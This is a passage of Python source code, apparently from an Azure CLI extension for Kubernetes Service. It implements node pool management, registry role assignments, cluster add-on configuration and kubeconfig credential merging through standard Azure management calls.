if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type=None,
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
workload_runtime=None,
gpu_instance_profile=None,
snapshot_id=None,
host_group_id=None,
crg_id=None,
message_of_the_day=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version:
kubernetes_version = snapshot.kubernetes_version
if not os_type:
os_type = snapshot.os_type
if not os_sku:
os_sku = snapshot.os_sku
if not node_vm_size:
node_vm_size = snapshot.vm_size
creationData = CreationData(
source_resource_id=snapshot_id
)
if not os_type:
os_type = "Linux"
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
scale_down_mode=scale_down_mode,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
workload_runtime=workload_runtime,
gpu_instance_profile=gpu_instance_profile,
creation_data=creationData,
host_group_id=host_group_id,
capacity_reservation_group_id=crg_id
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
if message_of_the_day:
agent_pool.message_of_the_day = _get_message_of_the_day(
message_of_the_day)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,
aks_custom_headers=None,
snapshot_id=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
scale_down_mode=None,
min_count=None, max_count=None,
max_surge=None,
mode=None,
labels=None,
node_taints=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not scale_down_mode and not mode and not max_surge and labels is None and node_taints is None):
reconcilePrompt = 'no argument specified to update would you like to reconcile to current settings?'
if not prompt_y_n(reconcilePrompt, default="n"):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--scale-down-mode" or "--labels" or "--node-taints')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if node_taints is not None:
taints_array = []
if node_taints != '':
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise InvalidArgumentValueError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
instance.node_taints = taints_array
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if scale_down_mode is not None:
instance.scale_down_mode = scale_down_mode
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_stop(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Stopped")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_start(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Running")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
ignore_pod_disruption_budget=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name, ignore_pod_disruption_budget=ignore_pod_disruption_budget)
def aks_addon_list_available():
available_addons = []
for k, v in ADDONS.items():
available_addons.append({
"name": k,
"description": ADDONS_DESCRIPTIONS[v]
})
return available_addons
def aks_addon_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
current_addons = []
for name, addon in ADDONS.items():
if not addon_profiles or addon not in addon_profiles:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": False
})
else:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": addon_profiles[addon].enabled
})
return current_addons
def aks_addon_show(cmd, client, resource_group_name, name, addon): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return {
"name": addon,
"api_key": addon_key,
"config": addon_profiles[addon_key].config,
"identity": addon_profiles[addon_key].identity
}
def aks_addon_enable(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
return enable_addons(cmd, client, resource_group_name, name, addon, workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_addon_disable(cmd, client, resource_group_name, name, addon, no_wait=False):
return aks_disable_addons(cmd, client, resource_group_name, name, addon, no_wait)
def aks_addon_update(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return enable_addons(cmd, client, resource_group_name, name, addon, check_enabled=False,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None, no_wait=False, enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
# this is overwritten by _update_addons(), so the value needs to be recorded here
msi_auth = True if instance.service_principal_profile.client_id == "msi" else False
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if not msi_auth:
raise ArgumentUsageError(
"--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(
workspace_resource_id)
addon_profile.config = {
logAnalyticsConstName: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
